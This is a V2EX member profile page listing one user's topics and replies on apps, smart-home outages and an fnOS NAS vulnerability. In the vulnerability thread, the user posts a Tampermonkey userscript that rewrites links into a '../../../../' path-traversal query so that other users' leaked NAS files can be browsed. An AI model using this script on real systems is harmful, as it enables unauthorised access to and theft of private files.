ucaime

ucaime

V2EX 第 45748 号会员,加入于 2013-09-21 17:36:18 +08:00
Arc 浏览器邀请码分享
分享邀请码  •  ucaime  •  2022 年 10 月 27 日
616 米家崩了后中枢网关用户的实际体验
  •  2   
    智能家电  •  ucaime  •  2024 年 5 月 20 日  •  最后回复来自 chixinzei
    9
    阿里企业智能平台型产品经理 3 月底前快速通道开启
    酷工作  •  ucaime  •  2020 年 2 月 12 日  •  最后回复来自 ucaime
    2
    有没有成熟的同时推流到多个直播平台的服务或软件?
    分享创造  •  ucaime  •  2020 年 5 月 22 日  •  最后回复来自 lty1993
    15
    ucaime 最近回复了
    Camtasia
    提供了一个快捷选项,在录制时自动隐藏桌面图标。付费的,不过作为生产力工具,这个应该是我花的很值的一笔投入,几乎满足所有关于录屏和剪辑、导出的需求
    早早已经把这类需求挖掘到极致了,一个小程序解决所有问题,各种查询筛选条件,几乎实时的比价和积分价排序,回血值都能帮你计算好~
    更重要的是有条件订阅,价格变化后订阅变更这个太重要了

    早早积分房助手——貌似是我自己常用的微信小程序排前三的高频应用
    如果能够 30 小时持续录音还是有竞争力的,但感觉价格还是太高了

    dWNhaXdAaG90bWFpbC5jb20=
    我最近在用这个( https://github.com/never13254/GhostType ),一起来维护个好的开源版?
    https://www.bilibili.com/video/BV1QbFszzErp/

    该漏洞居然 0.8.16 版本就存在了,2024 年 9 月 5 日
    @eber 应该是没仔细看这次的事件吧。即使没有映射和开放任何端口到外网,也没有通过自建的穿透到公网服务器,仍然可能会受到影响,这是 FNC 服务的设计导致的,通过遍历扫描几乎可以连接到所有开启了这个服务的机器,样本统计下来,FNC 开启率还是非常非常高的,平均下来也在 80%以上。这个是飞牛系统除硬件收入、企业订阅外的很大的商业收入来源,而且提供了免费慷慨的接入服务。

    如果开启这个服务也会导致所有数据全部泄露,那我感觉不太能因为这个行为怪用户~

    本质上是这个漏洞太低级了,低级到近 20 年我作为半个网安圈的人都没怎么遇到过知名系统犯过这个错误
    @qianlongzt 所以一直到现在,还有非常多仍然受到影响的。有意思的是可以看到飞牛自带 nginx 的日志,找了几个分析了下,早就被轮了无数遍了。

    https://imgur.com/a/ObaURjs
    @coolair 这并不能避免影响。现在的这俩漏洞不只是可以看到和拿到你的文件,还可以肆意乱搞,当成肉鸡或者挖矿都是小事,还可以开内网的洞,影响面可就不是这一台机器这么简单了。
    这个简单的油猴脚本就可以正常浏览用户泄露文件了

    ```Javascript
    // ==UserScript==
    // @name 路径遍历链接修复工具
    // @namespace http://tampermonkey.net/
    // @version 1.0
    // @description 修复特定路径下的 LFI/目录遍历链接拼接问题
    // @author xxx
    // @match *://*/app-center-static/serviceicon/myapp/%7B0%7D/*
    // @grant none
    // ==/UserScript==

    (function() {
    'use strict';

    // 获取当前页面的查询参数,即 ?size=../../../../ 部分
    const currentSearch = window.location.search;
    // 获取当前页面的基础路径,即 /app-center-static/serviceicon/myapp/%7B0%7D/
    const currentPath = window.location.pathname;

    // 选取所有的 <a> 标签
    const links = document.querySelectorAll('a');

    links.forEach(link => {
    // 获取 HTML 中原本的 href 属性值(例如 "vol1/" 或 "bin"),而非浏览器解析后的完整 URL
    const rawHref = link.getAttribute('href');

    if (rawHref) {
    // 核心逻辑:基础路径 + 原有查询参数 + 目标文件路径
    // 结果:.../myapp/%7B0%7D/?size=../../../../vol1/
    const newUrl = currentPath + currentSearch + rawHref;

    // 修改链接的指向
    link.href = newUrl;
    }
    });

    console.log(`已修正 ${links.length} 个路径遍历链接。`);
    })();
    ```
    《异物志》
    关于   ·   帮助文档   ·   自助推广系统   ·   博客   ·   API   ·   FAQ   ·   Solana   ·   2630 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 25ms · UTC 02:09 · PVG 10:09 · LAX 19:09 · JFK 22:09
    ♥ Do have faith in what you're doing.